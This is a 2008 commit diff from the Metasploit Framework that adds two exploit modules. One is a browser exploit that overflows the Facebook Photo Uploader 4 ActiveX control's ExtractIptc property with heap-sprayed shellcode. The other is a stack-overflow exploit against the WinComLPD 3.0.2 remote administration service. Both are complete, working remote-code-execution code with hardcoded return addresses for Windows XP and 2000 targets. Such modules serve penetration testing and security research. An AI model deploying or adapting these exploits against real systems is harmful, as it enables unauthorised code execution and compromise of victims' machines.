added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb.

git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da
2008-02-07 23:08:14 +00:00 · 2008-02-07 23:08:14 +00:00 · f4708d774f
parent 42be6e56a2
commit f4708d774f
2 changed files with 187 additions and 0 deletions
--- a/modules/exploits/windows/browser/facebook_extractiptc.rb
+++ b/modules/exploits/windows/browser/facebook_extractiptc.rb
@ -0,0 +1,108 @@
+##
+# $Id: facebook_extractiptc.rb 4953 2007-05-21 20:51:13Z hdm $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::Facebook_Extractiptc < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in Facebook Photo Uploader 4. 
+					By sending an overly long string to the "ExtractIptc()" property located 
+					in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute 
+					arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'MC' ], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'BID', '27534' ],
+					[ 'URL', 'http://milw0rm.com/exploits/5049' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 800,
+					'BadChars'      => "\x00\x09\x0a\x0d'\\",
+					'PrepenEncoder' => "\x81\xc4\x54\xf2\xff\xff",	
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English',     { 'Ret' => 0x74c9de3e } ], # 02/07/08  
+				],									               # ./msfpescan -i /tmp/oleacc.dll | grep SEHandler
+			'DisclosureDate' => 'Jan 31 2008',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+			false
+	end
+
+	def check_dependencies
+			use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Randomize some things
+		vname	  = rand_text_alpha(rand(100) + 1)
+		strname = rand_text_alpha(rand(100) + 1)
+		rand1   = rand_text_alpha(rand(100) + 1)
+		rand2   = rand_text_alpha(rand(100) + 1)
+		rand3   = rand_text_alpha(rand(100) + 1)
+		rand4   = rand_text_alpha(rand(100) + 1)
+		
+		# Set the exploit buffer
+		filler  = Rex::Text.to_unescape(rand_text_alpha(2))
+		jmp     = Rex::Text.to_unescape([0x969606eb].pack('V'))
+		ret     = Rex::Text.to_unescape([target.ret].pack('V'))
+		sc      = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+		# Build out the message
+		content = %Q|
+	<html>
+		<object classid='clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0' id='#{vname}'></object>
+		<script language='javascript'>
+     			#{rand1} = unescape('#{filler}');
+				while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}'); 
+			#{rand2} = unescape('#{jmp}');
+			#{rand3} = unescape('#{ret}');
+			#{rand4} = unescape('#{sc}');
+			#{strname} = #{rand1} + #{rand2} + #{rand3} + #{rand4};
+			#{vname}.ExtractIptc = #{strname};
+   		</script>
+	</html>
+                  |
+		
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+		
+		# Handle the payload
+		handler(cli)
+	end
+
+end
+end
--- a/modules/exploits/windows/lpd/wincomlpd_admin.rb
+++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb
@ -0,0 +1,79 @@
+##
+# $Id: wincomlpd_admin.rb 4498 2007-03-01 08:21:36Z mmiller $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Lpd::Wincomlpd_Admin < Msf::Exploit::Remote
+
+	include Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'WinComLPD <= 3.0.2 Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in WinComLPD <= 3.0.2.
+					By sending an overly long authentication packet to the remote
+					adminstration service, an attacker may be able to execute arbitrary
+					code.
+			},
+			'Author'         => 'MC',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision:$',
+			'References'     => 
+				[ 
+					['BID', '27614'],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 600,
+					'BadChars' => "\x00\x0a",
+					'StackAdjustment' => -3500,	
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
+					[ 'Windows 2000 Pro English All',   { 'Ret' => 0x75022ac4 } ],
+				],
+			'Privileged'     => true,
+			'DisclosureDate' => 'Feb 4 2008',
+			'DefaultTarget'  => 0))
+
+			register_options([Opt::RPORT(13500)], self)
+	end
+
+	def exploit
+		connect
+
+		# 'net start lpdservice' after you migrate!
+		sploit =  "\x65\x00\x00\x00\x00\x00\x00\x04\x00\x00\xFF\x1F"
+		sploit << make_nops(872 - payload.encoded.length)
+		sploit << payload.encoded + Rex::Arch::X86.jmp_short(6)
+		sploit << make_nops(2) + [target.ret].pack('V') + make_nops(8)
+		sploit << [0xe8, -550].pack('CV') + rand_text_alpha(rand(324) + 1)
+
+		print_status("Trying target #{target.name}...")
+		
+		sock.puts(sploit)
+		sleep(5)
+
+		handler
+		disconnect
+	end
+end
+end